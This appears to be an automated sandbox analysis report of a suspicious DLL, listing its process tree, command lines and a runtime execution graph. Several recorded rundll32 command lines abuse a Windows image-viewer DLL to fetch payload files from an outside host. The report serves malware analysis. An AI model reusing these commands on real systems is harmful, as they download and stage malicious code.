            2024-08-29 04:53:05 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
            Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            Behavior

            Click to jump to process

            System Behavior

            General

            Target ID:0
            Start time:00:53:00
            Start date:29/08/2024
            Path:C:\Windows\System32\loaddll32.exe
            Wow64 process (32bit):true
            Commandline:loaddll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll"
            Imagebase:0xc20000
            File size:126'464 bytes
            MD5 hash:51E6071F9CBA48E79F10C84515AAE618
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:1
            Start time:00:53:00
            Start date:29/08/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff66e660000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:2
            Start time:00:53:00
            Start date:29/08/2024
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll",#1
            Imagebase:0x1c0000
            File size:236'544 bytes
            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:3
            Start time:00:53:00
            Start date:29/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Users\user\Desktop\LLD5HDX0PS.dll,mydllmain
            Imagebase:0xe80000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:4
            Start time:00:53:00
            Start date:29/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll",#1
            Imagebase:0xe80000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:5
            Start time:00:53:00
            Start date:29/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
            Imagebase:0xe80000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            General

            Target ID:7
            Start time:00:53:00
            Start date:29/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
            Imagebase:0xe80000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            General

            Target ID:8
            Start time:00:53:00
            Start date:29/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
            Imagebase:0xe80000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            General

            Target ID:9
            Start time:00:53:00
            Start date:29/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
            Imagebase:0xe80000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            General

            Target ID:12
            Start time:00:53:03
            Start date:29/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
            Imagebase:0xe80000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            General

            Target ID:13
            Start time:00:53:03
            Start date:29/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
            Imagebase:0xe80000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            Disassembly

            Reset < >

              Execution Graph

              Execution Coverage:3.1%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:6.9%
              Total number of Nodes:2000
              Total number of Limit Nodes:31
              execution_graph 16953 6beef7fb 16956 6beef782 16953->16956 16957 6beef78e __FrameHandler3::FrameUnwindToState 16956->16957 16964 6bef351f RtlEnterCriticalSection 16957->16964 16959 6beef798 16960 6beef7c6 16959->16960 16965 6bef5692 16959->16965 16969 6beef7e4 16960->16969 16964->16959 16966 6bef56a0 _unexpected 16965->16966 16968 6bef56ad 16965->16968 16966->16968 16972 6bef53c5 16966->16972 16968->16959 17086 6bef3567 RtlLeaveCriticalSection 16969->17086 16971 6beef7d2 16974 6bef5445 16972->16974 16975 6bef53db 16972->16975 16976 6bef0444 __freea 14 API calls 16974->16976 16999 6bef5493 16974->16999 16975->16974 16981 6bef0444 __freea 14 API calls 16975->16981 16982 6bef540e 16975->16982 16977 6bef5467 16976->16977 16978 6bef0444 __freea 14 API calls 16977->16978 16983 6bef547a 16978->16983 16979 6bef0444 __freea 14 API calls 16984 6bef543a 16979->16984 16980 6bef54a1 16985 6bef5501 16980->16985 16997 6bef0444 14 API calls __freea 16980->16997 16986 6bef5403 16981->16986 16987 6bef0444 __freea 14 API calls 16982->16987 16998 6bef5430 16982->16998 16988 6bef0444 __freea 14 API calls 16983->16988 16989 6bef0444 __freea 14 API calls 16984->16989 16990 6bef0444 __freea 14 API calls 16985->16990 17000 6bef56e2 16986->17000 16992 6bef5425 16987->16992 16993 6bef5488 16988->16993 16989->16974 16994 6bef5507 16990->16994 17028 6bef57e0 16992->17028 16996 6bef0444 __freea 14 API calls 16993->16996 16994->16968 16996->16999 16997->16980 16998->16979 17040 6bef5536 16999->17040 17001 6bef56f3 17000->17001 17027 6bef57dc 17000->17027 17002 6bef5704 17001->17002 17003 6bef0444 __freea 14 API calls 17001->17003 17004 6bef5716 17002->17004 17005 6bef0444 __freea 14 API calls 17002->17005 17003->17002 17006 6bef5728 17004->17006 17007 6bef0444 __freea 14 API calls 17004->17007 17005->17004 17008 6bef573a 17006->17008 17009 6bef0444 __freea 14 API calls 17006->17009 17007->17006 17010 6bef574c 17008->17010 17011 6bef0444 __freea 14 API calls 17008->17011 17009->17008 17012 6bef575e 17010->17012 17013 6bef0444 __freea 14 API calls 17010->17013 17011->17010 17014 6bef5770 17012->17014 17015 6bef0444 __freea 14 API calls 17012->17015 17013->17012 17016 6bef5782 17014->17016 17017 6bef0444 __freea 14 API calls 17014->17017 17015->17014 17018 6bef5794 17016->17018 17019 6bef0444 __freea 14 API calls 17016->17019 17017->17016 17020 6bef57a6 17018->17020 17021 6bef0444 __freea 14 API calls 17018->17021 17019->17018 17022 6bef0444 __freea 14 API calls 17020->17022 17024 6bef57b8 17020->17024 17021->17020 17022->17024 17023 6bef57ca 17026 6bef0444 __freea 14 API calls 17023->17026 17023->17027 17024->17023 17025 6bef0444 __freea 14 API calls 17024->17025 17025->17023 17026->17027 17027->16982 17029 6bef57ed 17028->17029 17030 6bef5845 17028->17030 17031 6bef57fd 17029->17031 17032 6bef0444 __freea 14 API calls 17029->17032 17030->16998 17033 6bef580f 17031->17033 17034 6bef0444 __freea 14 API calls 17031->17034 17032->17031 17035 6bef5821 17033->17035 17036 6bef0444 __freea 14 API calls 17033->17036 17034->17033 17037 6bef5833 17035->17037 17038 6bef0444 __freea 14 API calls 17035->17038 17036->17035 17037->17030 17039 6bef0444 __freea 14 API calls 17037->17039 17038->17037 17039->17030 17041 6bef5562 17040->17041 17042 6bef5543 17040->17042 17041->16980 17042->17041 17046 6bef586e 17042->17046 17045 6bef0444 __freea 14 API calls 17045->17041 17047 6bef555c 17046->17047 17048 6bef587f 17046->17048 17047->17045 17082 6bef5849 17048->17082 17051 6bef5849 _unexpected 14 API calls 17052 6bef5892 17051->17052 17053 6bef5849 _unexpected 14 API calls 17052->17053 17054 6bef589d 17053->17054 17055 6bef5849 _unexpected 14 API calls 17054->17055 17056 6bef58a8 17055->17056 17057 6bef5849 _unexpected 14 API calls 17056->17057 17058 6bef58b6 17057->17058 17059 6bef0444 __freea 14 API calls 17058->17059 17060 6bef58c1 17059->17060 17061 6bef0444 __freea 14 API calls 17060->17061 17062 6bef58cc 17061->17062 17063 6bef0444 __freea 14 API calls 17062->17063 17064 6bef58d7 17063->17064 17065 6bef5849 _unexpected 14 API calls 17064->17065 17066 6bef58e5 17065->17066 17067 6bef5849 _unexpected 14 API calls 17066->17067 17068 6bef58f3 17067->17068 17069 6bef5849 _unexpected 14 API calls 17068->17069 17070 6bef5904 17069->17070 17071 6bef5849 _unexpected 14 API calls 17070->17071 17072 6bef5912 17071->17072 17073 6bef5849 _unexpected 14 API calls 17072->17073 17074 6bef5920 17073->17074 17075 6bef0444 __freea 14 API calls 17074->17075 17076 6bef592b 17075->17076 17077 6bef0444 __freea 14 API calls 17076->17077 17078 6bef5936 17077->17078 17079 6bef0444 __freea 14 API calls 17078->17079 17080 6bef5941 17079->17080 17081 6bef0444 __freea 14 API calls 17080->17081 17081->17047 17085 6bef585b 17082->17085 17083 6bef586a 17083->17051 17084 6bef0444 __freea 14 API calls 17084->17085 17085->17083 17085->17084 17086->16971 17087 6beee7f2 17102 6bef4512 17087->17102 17092 6beee80e 17095 6bef0444 __freea 14 API calls 17092->17095 17093 6beee81a 17129 6beee84b 17093->17129 17096 6beee814 17095->17096 17098 6bef0444 __freea 14 API calls 17099 6beee83e 17098->17099 17100 6bef0444 __freea 14 API calls 17099->17100 17101 6beee844 17100->17101 17103 6bef451b 17102->17103 17104 6beee803 17102->17104 17151 6beef552 17103->17151 17108 6bef49e8 GetEnvironmentStringsW 17104->17108 17109 6bef4a00 17108->17109 17122 6beee808 17108->17122 17110 6bef4945 __vfwprintf_l WideCharToMultiByte 17109->17110 17111 6bef4a1d 17110->17111 17112 6bef4a27 FreeEnvironmentStringsW 17111->17112 17113 6bef4a32 17111->17113 17112->17122 17114 6bef047e __fread_nolock 15 API calls 17113->17114 17115 6bef4a39 17114->17115 17116 6bef4a52 17115->17116 17117 6bef4a41 17115->17117 17119 6bef4945 __vfwprintf_l WideCharToMultiByte 17116->17119 17118 6bef0444 __freea 14 API calls 17117->17118 17120 6bef4a46 FreeEnvironmentStringsW 17118->17120 17121 6bef4a62 17119->17121 17120->17122 17123 6bef4a69 17121->17123 17124 6bef4a71 17121->17124 17122->17092 17122->17093 17125 6bef0444 __freea 14 API calls 17123->17125 17126 6bef0444 __freea 14 API calls 17124->17126 17127 6bef4a6f FreeEnvironmentStringsW 17125->17127 17126->17127 17127->17122 17130 6beee860 17129->17130 17131 6bef1658 _unexpected 14 API calls 17130->17131 17132 6beee887 17131->17132 17133 6beee88f 17132->17133 17142 6beee899 17132->17142 17134 6bef0444 __freea 14 API calls 17133->17134 17150 6beee821 17134->17150 17135 6beee8f6 17136 6bef0444 __freea 14 API calls 17135->17136 17136->17150 17137 6bef1658 _unexpected 14 API calls 17137->17142 17138 6beee905 17312 6beee92d 17138->17312 17140 6beeed88 ___std_exception_copy 39 API calls 17140->17142 17142->17135 17142->17137 17142->17138 17142->17140 17144 6beee920 17142->17144 17146 6bef0444 __freea 14 API calls 17142->17146 17143 6bef0444 __freea 14 API calls 17145 6beee912 17143->17145 17147 6beedf26 __vfwprintf_l 11 API calls 17144->17147 17148 6bef0444 __freea 14 API calls 17145->17148 17146->17142 17149 6beee92c 17147->17149 17148->17150 17150->17098 17152 6beef55d 17151->17152 17155 6beef563 17151->17155 17153 6bef1930 _unexpected 6 API calls 17152->17153 17153->17155 17154 6bef196f _unexpected 6 API calls 17156 6beef57d 17154->17156 17155->17154 17157 6beef569 17155->17157 17156->17157 17160 6bef1658 _unexpected 14 API calls 17156->17160 17158 6beeed44 __FrameHandler3::FrameUnwindToState 39 API calls 17157->17158 17159 6beef56e 17157->17159 17161 6beef5e7 17158->17161 17176 6bef431d 17159->17176 17162 6beef58d 17160->17162 17163 6beef5aa 17162->17163 17164 6beef595 17162->17164 17166 6bef196f _unexpected 6 API calls 17163->17166 17165 6bef196f _unexpected 6 API calls 17164->17165 17167 6beef5a1 17165->17167 17168 6beef5b6 17166->17168 17171 6bef0444 __freea 14 API calls 17167->17171 17169 6beef5ba 17168->17169 17170 6beef5c9 17168->17170 17172 6bef196f _unexpected 6 API calls 17169->17172 17173 6beef299 _unexpected 14 API calls 17170->17173 17171->17157 17172->17167 17174 6beef5d4 17173->17174 17175 6bef0444 __freea 14 API calls 17174->17175 17175->17159 17199 6bef4472 17176->17199 17181 6bef047e __fread_nolock 15 API calls 17182 6bef4371 17181->17182 17183 6bef4379 17182->17183 17184 6bef4387 17182->17184 17186 6bef0444 __freea 14 API calls 17183->17186 17217 6bef456d 17184->17217 17188 6bef4360 17186->17188 17188->17104 17189 6bef43bf 17190 6bef0431 __dosmaperr 14 API calls 17189->17190 17191 6bef43c4 17190->17191 17194 6bef0444 __freea 14 API calls 17191->17194 17192 6bef4406 17193 6bef444f 17192->17193 17228 6bef3f96 17192->17228 17197 6bef0444 __freea 14 API calls 17193->17197 17194->17188 17195 6bef43da 17195->17192 17198 6bef0444 __freea 14 API calls 17195->17198 17197->17188 17198->17192 17200 6bef447e __FrameHandler3::FrameUnwindToState 17199->17200 17208 6bef4498 17200->17208 17236 6bef351f RtlEnterCriticalSection 17200->17236 17202 6bef4347 17210 6bef40a4 17202->17210 17203 6beeed44 __FrameHandler3::FrameUnwindToState 39 API calls 17207 6bef4511 17203->17207 17204 6bef44a8 17205 6bef44d4 17204->17205 17209 6bef0444 __freea 14 API calls 17204->17209 17237 6bef44f1 17205->17237 17208->17202 17208->17203 17209->17205 17211 6bef150b __DllMainCRTStartup@12 39 API calls 17210->17211 17212 6bef40b6 17211->17212 17213 6bef40d7 17212->17213 17214 6bef40c5 GetOEMCP 17212->17214 17215 6bef40ee 17213->17215 17216 6bef40dc GetACP 17213->17216 17214->17215 17215->17181 17215->17188 17216->17215 17218 6bef40a4 41 API calls 17217->17218 17221 6bef458d 17218->17221 17219 6bef4692 17222 6bee4ad5 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 17219->17222 17220 6bef45e5 __fread_nolock 17241 6bef4178 17220->17241 17221->17219 17221->17220 17223 6bef45ca IsValidCodePage 17221->17223 17224 6bef43b4 17222->17224 17223->17219 17225 6bef45dc 17223->17225 17224->17189 17224->17195 17225->17220 17226 6bef4605 GetCPInfo 17225->17226 17226->17219 17226->17220 17229 6bef3fa2 __FrameHandler3::FrameUnwindToState 17228->17229 17300 6bef351f RtlEnterCriticalSection 17229->17300 17231 6bef3fac 17301 6bef3fe3 17231->17301 17236->17204 17240 6bef3567 RtlLeaveCriticalSection 17237->17240 17239 6bef44f8 17239->17208 17240->17239 17242 6bef41a0 GetCPInfo 17241->17242 17251 6bef4269 17241->17251 17244 6bef41b8 17242->17244 17242->17251 17243 6bee4ad5 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 17246 6bef431b 17243->17246 17245 6bef5952 __DllMainCRTStartup@12 42 API calls 17244->17245 17247 6bef4220 17245->17247 17246->17219 17252 6bef8ee3 17247->17252 17250 6bef8ee3 43 API calls 17250->17251 17251->17243 17253 6bef150b __DllMainCRTStartup@12 39 API calls 17252->17253 17254 6bef8ef6 17253->17254 17257 6bef8cf4 17254->17257 17258 6bef8d0f 17257->17258 17259 6bef488b __fread_nolock MultiByteToWideChar 17258->17259 17262 6bef8d53 17259->17262 17260 6bef8ece 17261 6bee4ad5 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 17260->17261 17263 6bef4241 17261->17263 17262->17260 17264 6bef047e __fread_nolock 15 API calls 17262->17264 17266 6bef8d79 __alloca_probe_16 17262->17266 17277 6bef8e21 17262->17277 17263->17250 17264->17266 17265 6bef5a53 __freea 14 API calls 17265->17260 17267 6bef488b __fread_nolock MultiByteToWideChar 17266->17267 17266->17277 17268 6bef8dc2 17267->17268 17268->17277 17285 6bef19fc 17268->17285 17271 6bef8df8 17274 6bef19fc 6 API calls 17271->17274 17271->17277 17272 6bef8e30 17273 6bef8eb9 17272->17273 17275 6bef047e __fread_nolock 15 API calls 17272->17275 17278 6bef8e42 __alloca_probe_16 17272->17278 17276 6bef5a53 __freea 14 API calls 17273->17276 17274->17277 17275->17278 17276->17277 17277->17265 17278->17273 17279 6bef19fc 6 API calls 17278->17279 17280 6bef8e85 17279->17280 17280->17273 17281 6bef4945 __vfwprintf_l WideCharToMultiByte 17280->17281 17282 6bef8e9f 17281->17282 17282->17273 17283 6bef8ea8 17282->17283 17284 6bef5a53 __freea 14 API calls 17283->17284 17284->17277 17291 6bef16cf 17285->17291 17289 6bef1a4d LCMapStringW 17290 6bef1a0d 17289->17290 17290->17271 17290->17272 17290->17277 17292 6bef17ce _unexpected 5 API calls 17291->17292 17293 6bef16e5 17292->17293 17293->17290 17294 6bef1a59 17293->17294 17297 6bef16e9 17294->17297 17296 6bef1a64 17296->17289 17298 6bef17ce _unexpected 5 API calls 17297->17298 17299 6bef16ff 17298->17299 17299->17296 17300->17231 17302 6beedc53 __fread_nolock 39 API calls 17301->17302 17303 6bef4005 17302->17303 17304 6beedc53 __fread_nolock 39 API calls 17303->17304 17305 6bef4024 17304->17305 17306 6bef3fb9 17305->17306 17307 6bef0444 __freea 14 API calls 17305->17307 17308 6bef3fd7 17306->17308 17307->17306 17311 6bef3567 RtlLeaveCriticalSection 17308->17311 17310 6bef3fc5 17310->17193 17311->17310 17313 6beee93a 17312->17313 17314 6beee90b 17312->17314 17315 6beee951 17313->17315 17316 6bef0444 __freea 14 API calls 17313->17316 17314->17143 17317 6bef0444 __freea 14 API calls 17315->17317 17316->17313 17317->17314 16499 6bee4b49 16500 6bee4b54 16499->16500 16506 6bee4b63 16499->16506 16501 6bee4b79 16500->16501 16502 6bee4b59 16500->16502 16509 6bee4b9c 16501->16509 16503 6bee4b5e 16502->16503 16504 6bee4b6f 16502->16504 16503->16506 16523 6bee51de 16503->16523 16528 6bee51bf 16504->16528 16510 6bee4ba8 __FrameHandler3::FrameUnwindToState 16509->16510 16536 6bee524f 16510->16536 16512 6bee4baf 16513 6bee4c9b 16512->16513 16514 6bee4bd6 16512->16514 16520 6bee4c12 ___scrt_is_nonwritable_in_current_image __InternalCxxFrameHandler 16512->16520 16555 6bee53ee IsProcessorFeaturePresent 16513->16555 16547 6bee51b1 16514->16547 16517 6bee4ca2 16518 6bee4be5 __RTC_Initialize 16518->16520 16550 6bee50d5 RtlInitializeSListHead 16518->16550 16520->16506 16521 6bee4bf3 16521->16520 16551 6bee5186 16521->16551 16696 6beeecbe 16523->16696 16785 6bee671c 16528->16785 16533 6bee51db 16533->16506 16534 6bee6727 21 API calls 16535 6bee51c8 16534->16535 16535->16506 16537 6bee5258 16536->16537 16559 6bee55eb IsProcessorFeaturePresent 16537->16559 16541 6bee526d 16541->16512 16542 6bee5269 16542->16541 16569 6beeeca1 16542->16569 16545 6bee5284 16545->16512 16690 6bee5288 16547->16690 16549 6bee51b8 16549->16518 16550->16521 16552 6bee518b ___scrt_release_startup_lock 16551->16552 16553 6bee55eb IsProcessorFeaturePresent 16552->16553 16554 6bee5194 16552->16554 16553->16554 16554->16520 16556 6bee5404 __InternalCxxFrameHandler __fread_nolock 16555->16556 16557 6bee54af IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16556->16557 16558 6bee54f3 __InternalCxxFrameHandler 16557->16558 16558->16517 16560 6bee5264 16559->16560 16561 6bee66fd 16560->16561 16578 6bee77a7 16561->16578 16564 6bee6706 16564->16542 16566 6bee670e 16567 6bee6719 16566->16567 16592 6bee77e3 16566->16592 16567->16542 16632 6bef4b10 16569->16632 16572 6bee672f 16573 6bee6738 16572->16573 16574 6bee6742 16572->16574 16575 6bee6868 ___vcrt_uninitialize_ptd 6 API calls 16573->16575 16574->16541 16576 6bee673d 16575->16576 16577 6bee77e3 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 16576->16577 16577->16574 16579 6bee77b0 16578->16579 16581 6bee77d9 16579->16581 16582 6bee6702 16579->16582 16596 6bee79ec 16579->16596 16583 6bee77e3 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 16581->16583 16582->16564 16584 6bee6835 16582->16584 16583->16582 16613 6bee78fd 16584->16613 16589 6bee6865 16589->16566 16591 6bee684a 16591->16566 16593 6bee77ee 16592->16593 16595 6bee780d 16592->16595 16594 6bee77f8 RtlDeleteCriticalSection 16593->16594 16594->16594 16594->16595 16595->16564 16601 6bee7812 16596->16601 16599 6bee7a24 InitializeCriticalSectionAndSpinCount 16600 6bee7a0f 16599->16600 16600->16579 16602 6bee782f 16601->16602 16605 6bee7833 16601->16605 16602->16599 16602->16600 16603 6bee789b GetProcAddress 16603->16602 16605->16602 16605->16603 16606 6bee788c 16605->16606 16608 6bee78b2 LoadLibraryExW 16605->16608 16606->16603 16607 6bee7894 FreeLibrary 16606->16607 16607->16603 16609 6bee78f9 16608->16609 16610 6bee78c9 GetLastError 16608->16610 16609->16605 16610->16609 16611 6bee78d4 ___vcrt_FlsSetValue 16610->16611 16611->16609 16612 6bee78ea LoadLibraryExW 16611->16612 16612->16605 16614 6bee7812 ___vcrt_FlsSetValue 5 API calls 16613->16614 16615 6bee7917 16614->16615 16616 6bee7930 TlsAlloc 16615->16616 16617 6bee683f 16615->16617 16617->16591 16618 6bee79ae 16617->16618 16619 6bee7812 ___vcrt_FlsSetValue 5 API calls 16618->16619 16620 6bee79c8 16619->16620 16621 6bee6858 16620->16621 16622 6bee79e3 TlsSetValue 16620->16622 16621->16589 16623 6bee6868 16621->16623 16622->16621 16624 6bee6872 16623->16624 16625 6bee6878 16623->16625 16627 6bee7938 16624->16627 16625->16591 16628 6bee7812 ___vcrt_FlsSetValue 5 API calls 16627->16628 16629 6bee7952 16628->16629 16630 6bee796a TlsFree 16629->16630 16631 6bee795e 16629->16631 16630->16631 16631->16625 16633 6bef4b20 16632->16633 16634 6bee5276 16632->16634 16633->16634 16637 6bef0258 16633->16637 16642 6bef0308 16633->16642 16634->16545 16634->16572 16641 6bef025f 16637->16641 16638 6bef02a2 GetStdHandle 16638->16641 16639 6bef0304 16639->16633 16640 6bef02b5 GetFileType 16640->16641 16641->16638 16641->16639 16641->16640 16643 6bef0314 __FrameHandler3::FrameUnwindToState 16642->16643 16654 6bef351f RtlEnterCriticalSection 16643->16654 16645 6bef031b 16655 6bef4fc4 16645->16655 16648 6bef0339 16674 6bef035f 16648->16674 16653 6bef0258 2 API calls 16653->16648 16654->16645 16656 6bef4fd0 __FrameHandler3::FrameUnwindToState 16655->16656 16657 6bef4ffa 16656->16657 16658 6bef4fd9 16656->16658 16677 6bef351f RtlEnterCriticalSection 16657->16677 16660 6bef0431 __dosmaperr 14 API calls 16658->16660 16661 6bef4fde 16660->16661 16662 6beedef9 __wsopen_s 39 API calls 16661->16662 16665 6bef032a 16662->16665 16665->16648 16668 6bef01a2 GetStartupInfoW 16665->16668 16666 6bef5006 16667 6bef5032 16666->16667 16678 6bef4f14 16666->16678 16685 6bef5059 16667->16685 16669 6bef01bf 16668->16669 16671 6bef0253 16668->16671 16670 6bef4fc4 40 API calls 16669->16670 16669->16671 16672 6bef01e7 16670->16672 16671->16653 16672->16671 16673 6bef0217 GetFileType 16672->16673 16673->16672 16689 6bef3567 RtlLeaveCriticalSection 16674->16689 16676 6bef034a 16676->16633 16677->16666 16679 6bef1658 _unexpected 14 API calls 16678->16679 16681 6bef4f26 16679->16681 16680 6bef4f33 16682 6bef0444 __freea 14 API calls 16680->16682 16681->16680 16683 6bef19b1 __wsopen_s 6 API calls 16681->16683 16684 6bef4f88 16682->16684 16683->16681 16684->16666 16688 6bef3567 RtlLeaveCriticalSection 16685->16688 16687 6bef5060 16687->16665 16688->16687 16689->16676 16691 6bee5298 16690->16691 16692 6bee5294 16690->16692 16693 6bee53ee 4 API calls 16691->16693 16695 6bee52a5 ___scrt_release_startup_lock 16691->16695 16692->16549 16694 6bee530e 16693->16694 16695->16549 16702 6beef46b 16696->16702 16699 6bee6727 16768 6bee676a 16699->16768 16703 6bee51e3 16702->16703 16704 6beef475 16702->16704 16703->16699 16705 6bef1930 _unexpected 6 API calls 16704->16705 16706 6beef47c 16705->16706 16706->16703 16707 6bef196f _unexpected 6 API calls 16706->16707 16708 6beef48f 16707->16708 16710 6beef332 16708->16710 16711 6beef34d 16710->16711 16712 6beef33d 16710->16712 16711->16703 16716 6beef353 16712->16716 16715 6bef0444 __freea 14 API calls 16715->16711 16717 6beef368 16716->16717 16718 6beef36e 16716->16718 16719 6bef0444 __freea 14 API calls 16717->16719 16720 6bef0444 __freea 14 API calls 16718->16720 16719->16718 16721 6beef37a 16720->16721 16722 6bef0444 __freea 14 API calls 16721->16722 16723 6beef385 16722->16723 16724 6bef0444 __freea 14 API calls 16723->16724 16725 6beef390 16724->16725 16726 6bef0444 __freea 14 API calls 16725->16726 16727 6beef39b 16726->16727 16728 6bef0444 __freea 14 API calls 16727->16728 16729 6beef3a6 16728->16729 16730 6bef0444 __freea 14 API calls 16729->16730 16731 6beef3b1 16730->16731 16732 6bef0444 __freea 14 API calls 16731->16732 16733 6beef3bc 16732->16733 16734 6bef0444 __freea 14 API calls 16733->16734 16735 6beef3c7 16734->16735 16736 6bef0444 __freea 14 API calls 16735->16736 16737 6beef3d5 16736->16737 16742 6beef17f 16737->16742 16743 6beef18b __FrameHandler3::FrameUnwindToState 16742->16743 16758 6bef351f RtlEnterCriticalSection 16743->16758 16746 6beef195 16748 6bef0444 __freea 14 API calls 16746->16748 16749 6beef1bf 16746->16749 16748->16749 16759 6beef1de 16749->16759 16750 6beef1ea 16751 6beef1f6 __FrameHandler3::FrameUnwindToState 16750->16751 16763 6bef351f RtlEnterCriticalSection 16751->16763 16753 6beef200 16754 6beef420 _unexpected 14 API calls 16753->16754 16755 6beef213 16754->16755 16764 6beef233 16755->16764 16758->16746 16762 6bef3567 RtlLeaveCriticalSection 16759->16762 16761 6beef1cc 16761->16750 16762->16761 16763->16753 16767 6bef3567 RtlLeaveCriticalSection 16764->16767 16766 6beef221 16766->16715 16767->16766 16769 6bee51e8 16768->16769 16770 6bee6774 16768->16770 16769->16506 16776 6bee7973 16770->16776 16773 6bee79ae ___vcrt_FlsSetValue 6 API calls 16774 6bee678a 16773->16774 16781 6bee674e 16774->16781 16777 6bee7812 ___vcrt_FlsSetValue 5 API calls 16776->16777 16778 6bee798d 16777->16778 16779 6bee79a5 TlsGetValue 16778->16779 16780 6bee677b 16778->16780 16779->16780 16780->16773 16782 6bee6758 16781->16782 16783 6bee6765 16781->16783 16782->16783 16784 6beed5ab ___vcrt_freefls@4 14 API calls 16782->16784 16783->16769 16784->16783 16791 6bee67a3 16785->16791 16787 6bee51c4 16787->16535 16788 6beeecb3 16787->16788 16789 6beef5e8 __dosmaperr 14 API calls 16788->16789 16790 6bee51d0 16789->16790 16790->16533 16790->16534 16792 